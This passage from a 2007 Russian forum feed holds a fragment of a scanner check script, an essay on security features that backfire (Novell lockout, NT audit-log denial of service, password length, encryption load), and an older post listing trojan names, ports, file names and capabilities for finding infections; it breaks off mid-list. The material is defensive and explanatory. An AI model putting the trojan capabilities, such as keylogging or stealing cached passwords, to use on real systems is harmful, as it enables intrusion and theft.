$crowbar::WTDB_OSType, length(&quot;Windows 95/98&quot;) + 1, &quot;Windows 95/98&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_Windows98/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Windows 98&quot;) + 1, &quot;Windows 98&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; }<br />}<br />&lt;/Test&gt;</p> <p>Приложение 2. Пример проверки, осуществляемой системой CyberCop CASL<br /># spoof_check.cape</p> <p># this script is used by the built-in filter checks<br /># please do not modify it<br />ip<br />ip_version=4<br />ip_proto=IPPROTO_UDP<br />ip_flags=0<br />ip_id=42<br />ip_done</p> <p>udp<br />udp_sport=6834<br />udp_dport=5574<br />udp_done</p> <p>data=SAS-ipspoofing</p> <p>end_of_packet</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:49:55 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=24#p24 https://viktoro2007.apbb.ru/viewtopic.php?pid=23#p23 <p>История компьютерной безопасности полна примеров, когда при разработке вычислительных систем (ВС) требования совместимости, эффективности, удобства вступали в противоречие с требованиями безопасности, и безопасность проигрывала. Аналогично, при администрировании системы, лицо, ответственное за это, имеет возможность настроить систему на больший или меньший уровень защищенности, но часто жертвует безопасностью в угоду тому же удобству пользователей, скорости обработки данных и т.п. Наверное, каждый, кто хоть немного интересуется безопасностью компьютерных систем, может привести не один пример на этот счет1. </p> <p>В этой же статье будет рассмотрен парадоксальный, на первый взгляд, аспект, когда безопасность вступает в противоречие с ... самой безопасностью. Это могут быть противоречия между защитными механизмами одного модуля системы и другого, влияние защиты от некоторого класса угроз на успешность осуществления других и т.п. </p> <p>Начну с примера, который и послужил толчком к созданию данной статьи. </p> <p>Пример 1. Супервизор кусает локти.<br />&quot;Отсутствие механизмов автоматического запрещения аутентификации после нескольких неудачных попыток и временного закрытия бюджета (account) пользователя ... может при использование простых средств аутентификации привести к подбору параметров аутентификации&quot; [1]. </p> <p>У сетевой ОС Novell Netware (пользующейся репутацией достаточно защищенной ОС: по крайней мере, Novell Netware 4.11 - единственная ОС широкого назначения, имеющая американский сертификат по классу защищенности для сетевых ОС) среди настроек есть пункт &quot;Intruder Detection&quot; (обнаружение нарушителей). Это громкое название на самом деле ни что иное, как регистрация на сервере неоднократных попыток ввода неправильного пароля. Правильно ли это с точки зрения компьютерной безопасности? Безусловно, регистрация попыток неверной аутентификации - обязательное требование к защищенным вычислительным системам, упоминаемое как в импортных, так и отечественных нормативных документах. Однако фирма Novell пошла несколько дальше - и логику тут легко понять - действительно, почему бы не просто фиксировать такие попытки, но и не пресекать их средствами ОС? Пусть хакер пытается подобрать пароль к вашему ресурсу (account) в системе, тогда через N1 попыток система выдает сообщение об попытке взлома, а через N2 - вообще блокирует дальнейшие попытки ввода паролей (в настройках Novell Netware это называется &quot;Lock account after detection&quot;). Логично? Безусловно. Правильно? А вот тут стоит чуть-чуть задуматься о том, что же означают слова &quot;блокировать дальнейшие попытки ввода паролей&quot;. А означают они буквально следующее - в течение некоторого времени t (&quot;Length of account lockout&quot;) никакой пароль не будет восприниматься системой, ваш ресурс будет заблокирован (disabled). Иначе говоря, в течение этого времени t даже вам, законному пользователю, не дадут зарегистрироваться в системе из-за действий хакера. </p> <p>В настройках Novell Netware 3.x по умолчанию N1=3, N2=7, t=15 минут. И вот теперь представим, что хакеру необходимо обезопасить свою новейшую атаку на Novell Netware от возможных контрдействий супервизора (замечу, супервизора, беспокоящегося о проблемах безопасности, поэтому он включил опцию &quot;Intruder detection&quot;). Он вводит 7 неправильных паролей супервизора, и в течении 15 минут может спокойно реализовывать свою основную атаку, супервизору останется лишь кусать локти. Самое интересное, что блокировка ресурса супервизора приводит к невозможности ни удаленно подключится к консоли с помощью RCONSOLE, ни разблокировать клавиатуру на консоли (опция в утилите MONITOR.NLM), т.е. он не может помешать атаке даже с консоли сервера. </p> <p>Итак, парадоксальное свершилось - администратор, настроив свою систему на потенциально больший уровень безопасности, оказался более беззащитен перед новой угрозой, чем если бы он этого не делал! Да, здесь налицо видны недостатки того решения, что предложила фирма Novell - можно было блокировать дальнейшие попытки ввода пароля только с одного сетевого адреса (т.е. конкретной машины), можно было разрешать доступ даже к заблокированному ресурсу, если все же введен правильный пароль, можно было вообще решать проблему удаленного подбора паролей введением увеличивающейся задержки на отклик при вводе очередного неправильного пароля - но ведь сделано именно так и, если не углубляться, кажется, что правильно! </p> <p>Безопасность о двух концах.<br />Пример выше еще раз убеждает в том, что при разработке и реализации подсистемы безопасности ВС принимаемые решения должны быть тщательно выверены и проанализированы со всех точек зрения (а не должны слепо следовать требованиям стандартов, нормативов или некоторой субъективной логики). Одну такую точку зрения я предлагаю в этой статье - ни одно решение, направленное на профилактику, затруднение, обнаружение, регистрацию, противодействие или восстановление от некоторой угрозы не должно повышать вероятность осуществления другой угрозы. Возможно, это требование будет самопротиворечиво в общем случае, тогда необходимо его уточнить так, что угрозы, вероятность осуществления которых может повыситься, не должны быть более опасными. </p> <p>Понятие &quot;опасности&quot; угрозы также нельзя, видимо, определить в общем случае (можно очень долго дискутировать, что, например, является более опасным - раскрытие или уничтожение информации, да это и не является целью данной статьи), но ранжирование угроз по степени опасности можно проводить, исходя из задач защищенной вычислительной системы. Для подавляющего большинства защищенных систем общего назначения, впрочем, можно признать, что из трех основных классов угроз: раскрытия, целостности и отказа в обслуживании, - последняя является наименее опасной. </p> <p>Таким образом, если условно разделить функции подсистемы защиты на (см. рис. 1): </p> <p>профилактику (предотвращение) <br />затруднение <br />обнаружение <br />противодействие (отражение) <br />регистрацию (учет) <br />восстановление <br />то для каждой из них можно придумать такие вполне вероятные способы внедрения, которые будут нарушать сформулированный выше принцип. <br /><br /> </p> <p>Рис. 1. Функции подсистемы защиты. </p> <p>К наиболее распространенным и универсальным (могущим существовать во многих ВС) я бы отнес следующие сценарии нарушения безопасности, использующие сами средства защиты (цифры соответствуют предыдущему списку): </p> <p>1. </p> <p>1.1. Предотвращение угрозы приводит к событию, которое является более уязвимым (нештатным) по сравнению с плановой работой системы. Этими событиями могут быть перезагрузки машины, переинициализации подсистемы безопасности и т.п. (см. пример 2 - использование механизма смены паролей для атак на подсистему аутентификации). </p> <p>1.2. Предотвращение угрозы требует значительных ресурсов ЭВМ, из-за чего систему легче подвергнуть отказу в обслуживании (см. пример 5 - использование шифрования трафика для атак отказа в обслуживании). </p> <p>2. Затруднение угрозы приводит к установке таких атрибутов безопасности, которые являются неприемлемыми для пользователей этой системы, что приводит к отключению или фактическому сведению на нет системы защиты (см. пример 4 - установка минимальной длины пароля для атак на криптографическую подсистему). </p> <p>3. Система обнаружения угроз имеет такие расплывчатые признаки угрозы, что ее постоянное срабатывание приводит к ее полному отключению (пример - резидентные антивирусные блокировщики первого поколения, доводившие пользователя до исступления вопросами &quot;Разрешать запись в файл XXX (Д/Н)?&quot;). </p> <p>4. </p> <p>4.1. Система противодействия реализована так, что она останавливает систему в крайнем случае с целью не допустить потери информации в ней. Тогда хакер может смоделировать &quot;крайний случай&quot; и система выйдет из строя. </p> <p>4.2. Система активного противодействия может пытаться заблокировать или уничтожить систему, с которой происходит атака. Злоумышленник может подменить адрес, с которого происходит атака, на адрес самой системы. </p> <p>4.3 Противодействие системы может быть направлено против ее администратора, отвечающего за отражение атаки. (см. пример 1 - блокирование ресурса администратора и невозможность противодействия им другим атакам). </p> <p>5. Использование системой регистрации значительных ресурсов ЭВМ, из-за чего происходит отказ системы (см. пример 3 - переполнение файла регистрации событий, приводящее к отказу в обслуживании). </p> <p>6. Предположим, что система восстановления поле атаки восстанавливает &quot;ядро&quot; системы из некого резервного источника. Но, если в результате атаки хакер сможет внедрить &quot;троянского коня&quot; непосредственно в резервную копию, то в результате такого восстановления эта закладка попадет в реально работающую систему. </p> <p>Далее будет рассмотрен ряд примеров, иллюстрирующий эти сценарии. </p> <p>Пример 2. Меняйте пароли чаще!<br />&quot;В случае однократной регистрации ... от пользователей необходимо потребовать, чтобы они регулярно меняли свои пароли&quot; [2]. </p> <p>Опять Novell Netware. Известно, что все пароли пользователей хранятся в ней на сервере в виде 128-битных значений, получаемых в результате применения хэш-функции к паролю. Знание этого хэш-значения злоумышленником автоматически приводит к возможности зарегистрироваться на сервере под именем того пользователя, чье хэш-значение он знает. (Это может быть сделано с помощью специальной слегка подправленной программы login, а также путем генерации &quot;псевдопароля&quot; из известного хэш-значения. Здесь используется тот факт, что хэш-функция, применяемая во всех версиях этой системы, является очень нестойкой и допускает очень быстрое вычисление коллизий (т.е. последовательностей, которые будет на выходе давать одно и то же хэш-значение) [3]). </p> <p>Именно поэтому хэш-значение тщательно охраняется, и не передается по сети в открытом виде при аутентификации пользователя на сервере. Вместо этого используется стандартная схема &quot;запрос-отклик&quot;: сервер посылает случайную последовательность, рабочая станция шифрует ее с вычисленным хэш-значением введенного пароля и отсылает обратно, сервер делает то же самое с имеющимся у него хэш-значением, в случае совпадения двух строк пользователь успешно регистрируется в системе. Но для этого как-то хэш-значение должно оказаться на сервере? Нетрудно понять, что по крайней мере оно должно попадать туда при смене пароля пользователем. А раз так, то злоумышленник, чтобы перехватить хэш, должен дождаться, пока пользователь захочет поменять свой пароль2. А это, к несчастью для него, может произойти в неопределенный момент времени. Если только он не знает этого момента заранее или ... не сможет заставить пользователя сделать это. Вспомним первый пример. Высока вероятность того, что пользователь (или супервизор), узнав о многочисленных попытках взлома своего ресурса (или обнаружив его заблокированным) захочет поменять свой пароль. (Впрочем, если он немного подумает, то он не попадется на эту удочку, и скорее всего попросит администратора отключить блокировку его ресурса в случае &quot;обнаружения нарушителя&quot;). </p> <p>Но на помощь кракеру может прийти другое мощное средство повышения безопасности системы Novell Netware (имеющееся, впрочем, почти во всех ОС, претендующих на защищенность), а именно &quot;заставлять периодически менять пароль&quot; (force periodic password changes). Зная, что администратор системы &quot;повысил&quot; ее защищенность путем периодической обязательной смены паролей, злоумышленнику остается только дождаться момента плановой смены паролей, и золотой ключик, т.е. хэш-значение супервизора у него в кармане. Этот пример я считаю весьма показательным. </p> <p>Пример 3. Новый &quot;нюк&quot; (nuke) - система аудита Windows NT.<br />&quot;Данные протокола аудита могут быть утеряны из-за нехватки пространства памяти, выделенного для их хранения, сбоя системы...&quot; [1] </p> <p>Как известно, одна из версий Windows NT была сертифицирована по американским требованиям С2 для своего несетевого варианта. И хотя эта сертификация вызывает много вопросов, существует утилита C2Config, которая формально позволяет настроить Windows NT в соответствии с требованиями С2. В частности, эти требования распространяются и на подсистему регистрации и учета (audit). Утилита C2Config предлагает следующую настройку аудита для повышения безопасности всей системы: </p> <p>&quot;Очистка протокола событий&quot; (Event Log Wrapping) - &quot;Не перезаписывать события (очищать вручную)&quot; (Do Not Overwrite Events (Clear Log Manually). </p> <p>Опять все кажется совершенно логичным. Да, администратор должен просмотреть все, что отражено в протоколе, после чего этот протокол можно стереть. Уничтожаться события в защищенной системе автоматически не должны, иначе регистрация атаки может оказаться невозможной. </p> <p>Однако смотрим следующий пункт меню: &quot;Останавливать систему когда протокол безопасности заполнен&quot; (Halt system when security log is full). Настройка по С2, естественно, &quot;Да&quot;. С точки зрения подсистемы аудита это, безусловно, правильно - протокол должен сохраняться всегда. А вот с точки зрения работоспособности системы? </p> <p>Итак, представим себе ленивого, но педантичного администратора, настроившего полностью свою систему по требованиям С2, после чего пребывает в уверенности, что теперь-то ему ничего не угрожает. Тогда хакер реализует массированную &quot;бомбежку&quot; этой системы однотипными запросами, которые система не считает очень опасными, но все же заносит в протокол. И вот рано или поздно, в зависимости от емкости жесткого диска, протокол переполняется и система встает. </p> <p>Итак, многочисленными, но безвредными для системы запросами ее удалось &quot;повесить&quot;. Зачем вам &quot;нюки&quot;, господа кракеры, подарите ненавистному администратору утилиту C2Config! </p> <p>Что самое забавное, в рекомендациях ВМФ США о безопасной инсталляции Windows NT 4.0 [4] пункт об остановке системы при переполнении протокола событий не рекомендуется разрешать! Что ж, здравомыслие иногда торжествует. </p> <p>Чуть-чуть другой вариант отказа в обслуживании, связанный с &quot;параноидальным&quot; использованием системы аудита, состоит в том, что на атакуемую систему массировано посылается шторм запросов, каждый из которых должен быть отражен в протоколе, и система ничем другим не может заниматься, кроме как дописывать в файл все новые и новые события. </p> <p>Пример 4. Пароль больше - кракеру проще.<br />&quot;... должны осуществляться идентификация и проверка подлинности субъектов доступа при входе в систему по идентификатору (коду) и паролю временного действия длиной не менее восьми буквенно-цифровых символов&quot; [5]. </p> <p>Человеческий фактор в криптосистемах (как, впрочем, и во всем остальном) играет особую и весьма заметную роль [3]. В частности, пользователи очень любят выбирать короткие и осмысленные пароли. Применив отрицание к последнему утверждению, получим, что пользователи не любят выбирать длинные или бессмысленные пароли. Ну а если некоторые характеристики паролей контролируются системой и &quot;слабые&quot; пароли не пропускаются? Проще всего проконтролировать длину пароля, а также совершить некоторые элементарные проверки - на совпадение с именем пользователя, с уже использованным паролем и т.п. </p> <p>Итак, предположим, администратор установил нижнюю границу длину пароля в N символов. И недолго думая, взял и поставил N=15, полагая, что теперь-то ему атаки с перебором паролей совершенно не страшны. </p> <p>Что же сделает пользователь? Пароль из 6 символов типа &quot;A95jwh&quot; он еще в состоянии запомнить, а вот требуемый от него 15-символьный &quot;Rg27#kjs$Zyx83a&quot; он уже не запомнит никогда (тем более, если он у него не один и время от времени меняется). Итак, у него есть два пути: </p> <p>взять бессмысленный пароль и прикрепить его себе на монитор (варианты - системный блок, спрятать в ящик стола); <br />ввести пароль, который он в состоянии запомнить. <br />А вот последних паролей не так много. В 80% случаев это будут пароли типа &quot;123456789012345&quot;, &quot;aaaaaaaaaaaaaab&quot;, &quot;svetasvetasveta&quot;, &quot;qwertyuiop[]asd&quot;, &quot;nuvy,blin,daete&quot;, &quot;papauvasisilenv&quot; - т.е. простые повторяющиеся комбинации, рядом стоящие символы на клавиатуре, припев популярной песенки и т.п. А такие пароли кракерам может быть легче вскрыть, чем бессмысленные 6-символьные. </p> <p>Совершенно очевидно, что если система будет требовать от пользователя не только длинный, но и бессмысленный пароль, то вот тут-то он точно повесит его на монитор. Или еще хуже (хуже - потому что пароль на мониторе хотя бы может увидеть администратор и отругать его) - запишет его в файл, а в AUTOEXEC.BAT пропишет команду: </p> <p>login &lt;password.txt </p> <p>Последний аспект коварства длинных паролей - их труднее набирать без ошибок. Ошибся несколько раз - и ... см. пример 1. </p> <p>Пример 5. Шифрование сетевого трафика.<br />&quot;К программным методам защиты в сети Internet можно отнести прежде всего защищенные криптопротоколы, с использованием которых появляется возможность надежной защиты соединения&quot; [6]. </p> <p>Важнейшей компонентой защиты распределенных вычислительных систем является шифрование информации, критичной к угрозе раскрытия, которая передается по открытым каналам связи (например, Internet). </p> <p>Рассмотрим вероятность успеха одного подвида атаки, направленного на отказ в обслуживании. Он &quot;состоит в передаче с одного адреса такого количества запросов на атакуемый объект, какое позволит трафик (направленный &quot;шторм&quot; запросов)&quot; [6]. </p> <p>Допустим, что без использования методов шифрования трафика (т.е. без защиты от угрозы раскрытия), порог &quot;шторма&quot;, при котором атакуемая система ничем другим не занимается, кроме как обрабатывает все новые и новые &quot;плохие&quot; запросы (и для &quot;хороших&quot; запросов эта система будет отказывать в обслуживании), равняется N запросов в секунду3. Вполне вероятно, что для хакера это N при низкопропускных каналах связи или значительной удаленности его от цели атаки будет недостижимым. </p> <p>Теперь рассмотрим систему, защищенную от угрозы раскрытия применением методов шифрования. (Рассуждая с точки зрения эффективности, совершенно очевиден тот факт, что какими бы быстрыми не были применяемые криптографические алгоритмы, пропускная способность такой системы всегда будет меньше (обычно в 2-5 раз), чем системы без шифрования - т.к. пакеты нужно зашифровывать и расшифровывать). В этом случае хакер может несколько изменить свою атаку на шторм &quot;псевдошифрованными&quot; запросами. Допустим, криптографические алгоритмы вполне совершенны, и хакер не может подделать зашифрованный пакет так, чтобы он воспринимался как правильный4. Но он вполне может подделать пакет так, чтобы он проходил первую (быструю) проверку &quot;по внешнему виду&quot; и поступал в процедуру расшифровки. И вот только она сможет его отвергнуть, расшифровав. Теперь уже совершенно очевидно, что система сможет обрабатывать значительно меньше запросов в секунду, чем N, из-за необходимости их расшифровки. А такое снижение N (до 2 порядков) вполне может привести к тому, что для хакера оно станет достижимым! </p> <p>Резюме.<br />Так что же получается? Не надо менять свои пароли? Не надо использовать аудит? Не надо шифровать трафик? Или же сформулированный принцип &quot;неповышения вероятности других угроз&quot; невыполним? Я думаю, выполним. Просто при каждом решении, направленным на борьбу с некоторой угрозой, надо тщательно проанализировать, как это решение скажется на других угрозах. И, мне кажется, всегда можно найти более правильный вариант реализации решения. Фирме Novell надо было запрещать идентификацию при подборе паролей только с определенного сетевого адреса (или, еще лучше, всегда разрешать идентификацию с некоторого безопасного адреса). Администратору надо было поставить ограничение на длину пароля в 6 символов и объяснить, как придумывать и запоминать неосмысленные пароли. Регистрацией некоторых событий в протоколе придется жертвовать, если он переполнен и если безотказность системы важна. При реализации системы шифрования пакетов надо придумать некую схему, которая позволяла бы отвергать пакет без его (полной) расшифровки, сведя к минимуму количество необходимых для этого машинных операций. </p> <p>Других обнадеживающим фактом я считаю, что все приведенные примеры не приводили к катастрофическим атакам, и, надеюсь, их не появится в будущем. <br /></p> <p>--------------------------------------------------------------------------------</p> <p>1 Вот один из последних, упоминаний о котором я не встречал. Windows NT можно настроить так, чтобы она не надоедала своим требованием нажать Ctrl+Alt+Del и ввести пароль, а делала это сама - например, с помощью программы Autologon Марка Руссиновича. Но при этом имя пользователя и его пароль будут хранится в реестре в открытом виде! Нужно ли говорить о том, что реестр иногда может быть просмотрен удаленно, а без установки Service Pack 3 это делается вообще элементарно! </p> <p>2 Знатоки Novell Netware не преминут меня подловить, сказав, что при смене пароля новое хэш-значение шифруется старым, и перехват его ничего не даст. А на это возражу, что в некоторых случаях, а именно, если пароль меняет супервизор через программу SYSCON, старое значение пароля у него не спрашивается. </p> <p>3 Эксперименты показывают, что для компьютера класса Pentium/166 это число равно порядка 10000. Причем Windows NT (с установкой даже Service Pack 4) при шторме такой силы сбрасывалась в &quot;синий экран&quot;. </p> <p>4 А также стоит защита от посылки повторных пакетов.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:49:16 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=23#p23 https://viktoro2007.apbb.ru/viewtopic.php?pid=22#p22 <p>ЛАМЕРАМ ПОСВЯЩАЕТСЯ </p> <p>Данная информация является лишь попыткой донести до читателя основы и не претендует на то, чтобы быть руководством к действию. </p> <p>Если у вас есть вопросы, буду рад связаться с вами по ICQ : 208745 </p> <p>Немного из личного опыта. Летом того года меня заинтересовала информация из журнала 2600 о проведенной, если не ошибаюсь, в Калифорнии конференции хакеров, а частности о представленной там &quot;Культом Мертвой Коровы&quot; (Cult of the Dead Cow Communications) клиент-сервер апликации Back Orifice, или так называемой BO. </p> <p>Найдя файл и инсталлировав у себя на одном из тест-серверов, а также изменив пассворд доступа, я был приятно удивлен способностями этой ничего не &quot;весящей&quot; (122 kb) серверной части. </p> <p>Интересно, подумалось мне, а есть ли что нибудь еще? И занялся поисками. Поиски мои то заходили в тупик, то давали великолепные результаты и в конце концов я бы оставил их за отсутствием времени, если бы не мой доступ на раутеры своей компании и ее клиентов. Что же я там нашел: то, что BO и NetBus становяться очень популярными в среде &quot;пользователей интернета&quot; (студентов, псевдохакоров, бездельников сети и всяческого около-&quot;криминального&quot; элемента, не уничтоженного как класс в период Великой Социалистической Революции). </p> <p>Попытки сканов моего LAN на предмет выявления зараженного BO или NetBus-ом (you name it) компьютера начали уже просто мозолить глаза и генерировать отдельные сотни килобайт лога. </p> <p>К октябрю-ноябрю того года, имея доступ к компьютерам численностью более 4.000, я решил просканить все их конкретнее на предмет известных мне троянов (к тому времени обладал инфо о 34 их видах, плюс порядка 20 разновидностей). Результаты скана порадовали: 5 процентов пользователей были заражены. Учитывая возможности троянов, я решил предупредить своих знакомых и админов сетей клиентов, собрав некоторую информацию и опубликовав у себя в &quot;базе знаний&quot; компании, а также на своем вебсервере, вебмастером которого я и являюсь (wwwrusskie.com). Сейчас же я хотел предоставить ее и вам, уважаемые мои читатели-он-лайнщики. </p> <p>Итак на 21 января 99 года <br /><br /></p> <p>Перечень имен троянов, известных мне (37 названий, без указания версий и дополений)<br />Acid Shivers <br />Antigen <br />Back End <br />Back Orifice <br />Back Door <br />DeepThroat <br />Devil <br />Dmsetup <br />EvilFTP <br />Executer 1 <br />Executer 2 <br />Fore 1.0b <br />FTP99cmp <br />GateCrasher <br />GirlFriend <br />Hacker's Paradise <br />ICKiLLEr <br />ICQ Troqen <br />Invisible FTP <br />Master's Paradise <br />Millenium <br />NetBus <br />Net Monitor <br />phAse zero <br />Phineas Phucker <br />PSS <br />Remote Grab <br />Ripper Pro <br />Remote windows shutdown) <br />Shtirlitz <br />Sivka-Burka <br />Sstrojg ( Senna Spy Trojan Back Door Generator ) <br />Sockets de Troje <br />StealthSpy Beta <br />Telecommando <br />Voice <br />Win Crash <br /> <br /><br /><br /><br /></p> <p>Список портов, используемых ими по умолчанию (44 основных порта)<br />Некоторые трояны используют порт 21, 23, 80, 25 и так далее -- порты, которые заняты легальными сервисами: вебсервером, мейлом, телнетом, фтп и так далее. Данные о этих троянах в этом листе не указаны. Многие трояны имеют возможность переадресации сервера на работу с другим портом. Некоторые трояны слушают клиент в большом диапозоне портов допустим с 1000 до 6000. Они тут не указаны. Словом -- удачи:) </p> <p>11000 <br />1170 <br />12345 <br />12346 <br />1492 <br />1600 <br />1999 <br />20001 <br />20034 <br />2023 <br />2140 <br /> 21544 <br />23456 <br />2801 <br />3024 <br />31337 <br />31338 <br />3150 <br />40421 <br />40422 <br />40423 <br />40426 <br /> 4092 <br />456 <br />4950 <br />5000 <br />5001 <br />50766 <br />53001 <br />555 <br />5714 <br />5741 <br />5742 <br /> 61466 <br />65000 <br />6969 <br />6970 <br />7000 <br />7300 <br />7301 <br />7306 <br />7307 <br />7308 <br />7789 <br /> <br /><br /> <br /><br /><br /><br /></p> <p>Перечень имен файлов клиентов и серверов для поиска на локальных машинах (107 имен файлов)<br />Данные даны в форме: filename, (размер файла). Если имя файла встречается несколько раз подряд, а размер разный, это говорит о том, что это информация об одном и том же трояне, но различных его версиях, а следовательно и дополнительных функциях. Данные даны по клиентам и серверам. Данные отдельно по серверам публиковаться не будут, так как при наличии клиента без сервера -- становится ясно, что машина потенциально заражена или используется в целях заражения - что в принципе все едино, и пистон вставить надо в любом случае тому, у кого гадость на ящике:) <br /></p> <p>ACiDShivers.exe (186368) <br />Agent.exe (293376) <br />Agent.exe (325632) <br />Agent.exe (327680) <br />antigen.exe (19456) <br />backdoor.exe (233472) <br />backdoor.exe (241664) <br />backdoor.exe (294912) <br />backdoor.exe (344064) <br />backend.exe (102912) <br />boclient.exe (57856) <br />boclient.exe (707072) <br />bogui.exe (284160) <br />boserve.exe (124928) <br />bug.exe (57344) <br />cfg95.exe (79242) <br />client.exe (164352) <br />Client.exe (180224) <br />client.exe (202240) <br />client.exe (334848) <br />client.exe (471552) <br />client.exe (54272) <br />Controller.exe (313856) <br />Controller.exe (340992) <br />control.exe (499200) <br />DeepBo.exe (530432) <br />Devil13.exe (95232) <br />dmsetup.exe (40188) <br />Exec.exe (231424) <br />Exec.exe (249344) <br />faxmgr.exe (27648) <br />FixIT.exe (23087) <br />foreclient.exe (482304) <br />foresvr.exe (309248) <br />FTP99cmp.exe (369185) <br />ftpexe (402944) <br />gc.exe (221184) <br />GF.exe (425984) <br />GF.exe (454656) <br />gserver.exe (126976) <br />hs.exe (267264) <br />ICKiLLeR.exe (534016) <br />icqclient.exe (31744) <br />icqcrk.exe (50688) <br />ICQFlood.exe (24576) <br />ICQFuckerExtentitions.exe (182272) <br />icqnuke.exe (10240) <br />icqtrogen.exe (39424) <br />inet.drv (36864) <br />inet.hlp (98304) <br />KeyHook.dll (54272) <br />lame.exe (335872) <br />MSTConfig.exe (378880) <br />mustget.exe (527360) <br />NBSvr.exe (612864) <br />NetBus.exe (1114112) <br />NetBus.exe (494592) <br />NetBus.exe (567296) <br />NetBus.exe (599552) <br />NetMonitor.exe (205824) <br />netspy.exe (141312) <br />Paradise.exe (1096704) <br />Paradise.exe (1310208) <br />Paradise.exe (855552) <br />Paradise.exe (888320) <br />Paradise.exe (916480) <br />Paradise.exe (924672) <br />Patch.exe (494592) <br />Path.exe (472576) <br />phase.exe (301568) <br />Phineas.com (93250) <br />Phucker.exe (352768) <br />port.dat (94208) <br />port.doc (39424) <br />port.exe (40960) <br />procmom.exe (14848) <br />PSS-Client.exe (80384) <br />readme.exe (102400) <br />readme.exe (73728) <br />readme.exe (77824) <br />readme.exe (98304) <br />RemoteControl.exe (505344) <br />rgrab.exe (258048) <br />RipClient.exe (305664) <br />RipServer.exe (211968) <br />RmtEwxC.exe (268800) <br />server.exe (210432) <br />Server.exe (211456) <br />server.exe (296448) <br />server.exe (533013) <br />Setup.exe (14336) <br />sockets23.exe (1082880) <br />spyserver.exe (30720) <br />spy.exe (48128) <br />SysEdit.exe (473088) <br />SystemPatch.exe (491008) <br />TeLeCoMMaNDo.exe (327276) <br />telman.exe (137216) <br />telserv.exe (235520) <br />tserv.dll (82432) <br />uagent.exe (282624) <br />wave.dll (27648) <br />Wave.exe (38400) <br />win32cfg.exe (4128) <br />wincrash.exe (309248) <br />windll.exe (331264) <br />windll.exe (344064) <br /> <br /><br /><br /><br /></p> <p>Неотсортированный список возможностей нескольких (6-7) троянских коней (406 функций)<br />Lists most of the commands (description of command) <br />Hide a task from control + alt + delete <br />Show a hidden task in control + alt + delete <br />List Contents of Current Directory <br />Change To Specified Directory/Drive <br />Clear Screen <br />Kill Process by PID (Shown in PS) <br />Shows Running Processes <br />Deletes Specified Files <br />Change Port Acid Shiver Listens on (Until Next Reboot) <br />Change to default Windows Desktop folder <br />Change to Windows Recent folder <br />Change to default WS_FTP folder <br />Show Version Number of Acid Shiver <br />Show physical, RAM, CD-ROM, and Network drives <br />Relay connection to host on port, Control + C to abort <br />Sendkeys to active window <br />Show ethernet stats and physical address <br />Rename the users computer <br />Shows DOS Environment variables <br />Beeps the specified number of times <br />Type 'CDROM' for more informationv - Terminate Acid Shiver <br />Rename a specified disk drive <br />Type 'Shutdown' for more information <br />Retrives information on specified drive <br />Disconnect a session by socket index show in 'STATUS' <br />Shows users current system time <br />Shows users current system date <br />Shows some general system information about host and user <br />Show the state of all sockets used since last reboot <br />Retrieve specified file <br />Retrieve specified file in hex form <br />Run the specified shell command <br />Run the specified command and display results (may lock up) <br />Make a new directory <br />Remove a directory and all files and subdirectories inside <br />Сopy file1 to file2 <br />Spawn a text based application on a tcp port. <br />Stops an application from listening for connections. <br />Lists the applications currently listening for connections. <br />Creates a directory. <br />Lists files and directory. You must specify a wildcard if you want more than one file to be listed. <br />Removes a directory. <br />Creates an export on the server. <br />Deletes an export. <br />Lists current shared resourses (name, drive, access, password). <br />Copys a file. <br />Deletes a file. <br />Searches a directory tree for files that match a wildcard specification. <br />Compresses a file. <br />Decompresses a file. <br />Views the contents of a text file. <br />Disables the http server. <br />Enables the http server. <br />Logs keystrokes on the server machine to a text file. <br />Ends keyboard logging. To end keyboard logging from the text client, use 'keylog stop'. <br />Captures video and audio (if available) from a video input device to an avi file. <br />Captures a frame of video from a video input device to a bitmap file. <br />Captures an image of the server machine's screen to a bitmap file. <br />Lists video input devices. <br />Plays a wav file on the server machine. <br />Lists current incomming and outgoing network connections. <br />Disconnects the server machine from a network resource. <br />Connects the server machine to a network resource. <br />Views all network interfaces, domains, servers, and exports visable from the server machine. <br />Pings the host machine. Returns the machine name and the BO version number. <br />Executes a Back Orifice plugin. <br />Tells a specific plugin to shut down. <br />Lists active plugins or the return value of a plugin that has exited. <br />Terminates a process. <br />Lists running processes. <br />Runs a program. Otherwise it will be executed hidden or detached. <br />Redirects incomming tcp connections or udp packets to another ip address. <br />Stops a port redirection. <br />Lists active port redirections. <br />Creates a key in the registry. <br />Deletes a key from the registy. <br />Deletes a value from the registy. <br />Lists the sub keys of a registry key. <br />Lists the values of a registry key. <br />Sets a value for a registry key. <br />Resolves the ip address of a machine name relative to the server machine. <br />Creates a dialog box on the server machine with the supplied text and an 'ok' button. <br />Displays system information for the server machine. <br />Locks up the server machine. <br />Displays cached passwords for the current user and the screen saver password. <br />Shuts down the server machine and reboots it. <br />Connects the server machine and saves any data recieved from that connection to the specified file. <br />Connects the server machine and sends the contents of the specified file, then disconnects. <br />Ejecting And Closing The CD-ROM Drive. <br />Sends a Msg Box To The Host. <br />Hide\Show Startbar. <br />Starts a FTP Server (On Port 21). <br />Captures the screen to a Jpeg around 80 Kb and sends it to you. <br />Sends Host to A Url Of Your Choice. <br />Turn Monitor On/Off. <br />Spawn Prog. <br />Spawns a program invisibly. <br />Reboot <br />Scan for Hosts with DT server running. <br />Sends a packet to see in host is Running the Server. <br />Host System info. <br />Open/Close CDROM <br />Send &quot;Beep&quot; Signal <br />Send text to Notepad <br />Send Message &quot;Yche! Yche!&quot; with interval <br />Send Applications Bomb <br />Notepad Flooder <br />Reboot <br />Windows Clean Up <br />ICQ Killer <br />Full FTP access <br />Destroy Mouse Double Click <br />Change All System Colors To Yellow <br />Hang Up All Connections <br />Disable CTRL+ALT+DEL Keys <br />Set Cursor Position To 0,0 <br />Hide Windows TaskBar <br />Reboot Computer <br />Enable Jumping Mouse <br />Enable Mouse Double Click <br />Enable CTRL+ALT+DEL Keys <br />Show Windows TaskBar <br />Disable Jumping Mouse <br />Copy EXECUTER To C:\Windows\ Directory <br />Add EXECUTER To Windows StartUp <br />Show Message-'Hello' <br />Show Message-'Hello 